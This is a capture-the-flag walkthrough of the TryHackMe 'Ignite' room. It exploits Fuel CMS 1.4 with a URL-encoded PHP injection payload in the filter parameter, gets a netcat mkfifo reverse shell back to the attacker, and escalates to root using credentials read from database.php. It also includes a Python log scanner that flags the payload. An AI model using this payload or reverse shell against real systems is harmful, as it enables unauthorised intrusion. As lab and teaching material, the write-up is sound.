# Ignite

### <https://tryhackme.com/room/ignite>

Ignite is a simple challenge to practice your pentesting skills.

### Recon

As always we start with **nmap**

```bash
sudo nmap -sC -sV -oA nmap/ignite $IP
```

And we get the following output

```bash
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
```

Only one port is open, **Apache httpd 2.4.18**.

Upon opening the webpage we are greeted with **Welcome to Fuel CMS** *version 1.4*.

This tells us exactly what to search for when looking for vulnerabilities.

Looking through the page, this seems to be the default page shown when you first set up Fuel CMS.

At the end of the page it tells you where the admin login is with the default credentials.

Once logged in, let's search online for exploits. We can see that there is a Remote Code Execution exploit for exactly **version 1.4**.

### Remote Code Execution

I'll be using the payload from [this exploit](https://www.exploit-db.com/exploits/47138); however, I'll send it manually with **BurpSuite** instead of running the script.

Reading the Python script, we can see that it sends a payload in the `filter` parameter of **/fuel/pages/select/?filter**, which can execute system commands.

Let's navigate to the **pages** page on the left and start up BurpSuite. (If you don't know how to use Burp, I would highly recommend checking out some tutorials online or, if you're subscribed to THM, checking out [this room](https://tryhackme.com/room/rpburpsuite).)

Once you have your proxy and Burp set up, simply refresh the page to capture the request.

![](https://i.imgur.com/6rSebr6.png)

And send this to Repeater (Ctrl + R).

Now let's grab the payload and modify it by removing the `urllib.quote` call (with the +) and simply putting `ls` in its place.

```
/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%27%29%2b%27
```

Paste it onto the end of the *URL* in the request and press Send.

![](https://i.imgur.com/cxBpNhR.pngs)

And in the response you should see files in the current directory.

![](https://i.imgur.com/MjTegZX.png)

Awesome! We can execute commands on the system.

Now let's get a reverse shell.

I've tried a few reverse shells and the one that works for me is **NetCat OpenBSD** ([Here is a cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)).

Let's copy our URL-encoded payload, send it to **Decoder** and decode it as **URL**.

![](https://i.imgur.com/VorCmFe.png)

Paste your reverse shell command instead of `ls` (with the single quotes).

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $YOURIP $PORT >/tmp/f
```

And encode it as **URL**.

Start up `ncat` on your local machine to listen on your desired port.

Copy the **URL Encoded** payload, replace the current one you have in **Repeater** with it and send it.

You shouldn't receive any response.

![](https://i.imgur.com/q2PYqf9.png)

And instead you should get a shell back.
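Seen from the defender's side, both requests above (the `ls` test and the reverse shell) leave the same trace in the web server's access log: a `filter` value on `/fuel/pages/select/` that breaks out of a quoted string and calls a PHP function. The following log check is an added example, not part of the original write-up or of Fuel CMS; the log lines are constructed, and the `BREAKOUT` heuristic is an assumption about what a legitimate filter value looks like.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (sample data, not from the original page).
# The second request carries the `ls` test payload shown in the write-up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%27%29%2b%27 HTTP/1.1" 200 4096
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /fuel/pages/items/?search=o%27brien HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /fuel/pages/select/?filter=o%27brien HTTP/1.1" 200 530
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a page filter is a plain search term. A quote followed by PHP
# variable or function-call syntax is what the payload above decodes to.
BREAKOUT = re.compile(r"""['"].*(\$\w+|\b\w+\s*\()""", re.S)


def suspicious_filter(target):
    """Return the decoded `filter` value if it looks like PHP injection, else None."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith("/pages/select"):
        return None
    # parse_qs percent-decodes once, as PHP does when filling $_GET.
    for value in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
        if BREAKOUT.search(value):
            return value
    return None


def scan(log_text):
    """Return a list of (client_ip, decoded_filter) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m:
            decoded = suspicious_filter(m.group("target"))
            if decoded is not None:
                hits.append((m.group("ip"), decoded))
    return hits


if __name__ == "__main__":
    for ip, decoded in scan(SAMPLE_LOG):
        print(f"{ip} sent filter={decoded!r}")
```

A search term with an apostrophe (`o'brien`) is not flagged, because the rule requires call or variable syntax after the quote.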

### Privesc

Once you're in, always, and I say always, **stabilize your shell!**

This applies to Linux machines.

Do the following steps.

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl + Z to background the shell
stty raw -echo;fg   # after entering fg you will be brought back to your shell
```

Python will spawn you in a bash shell, setting the TERM to xterm will allow you to use `clear` and stty will let you use Ctrl + C, arrow keys and TAB completion.

The user flag is in the `/home` directory.

Now it's time to escalate our privileges. To save you the trouble, I tried using **LinEnum, linPeas, exploit suggester** to see if I could find any way to exploit this box, but there was nothing I could find.

If `www-data` has a home directory, then maybe we can run `sudo -l`, however that didn't help.

So that means that there are some credentials stored in a file. I started to snoop around the **Fuel CMS** GitHub repo and found an interesting file.

There is a **database.php** file where it keeps user credentials. [GitHub repo](https://github.com/daylightstudio/FUEL-CMS/tree/master/fuel/application/config).

Reading the file we discover the credentials for `root`.

![](https://i.imgur.com/fBOxFcX.png)

With this you get root on the box and the root flag is in `/root`.

## Conclusion

Ignite was quite an easy box. I decided to do a manual exploit with Burp since it makes you use your brain to think of ways to exploit something. Using already made scripts to exploit the box will not teach you anything.

I get this inspiration from IppSec ([link to his YouTube channel](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)). He does video tutorials on how to exploit machines on HackTheBox which are very well made and explained.

That is how I got the idea to search the GitHub repo for Fuel CMS to see if there are any default files that might store some valuable information.

I'd suggest you do research on the things you'll be attacking. You never know if you can find something really important online.


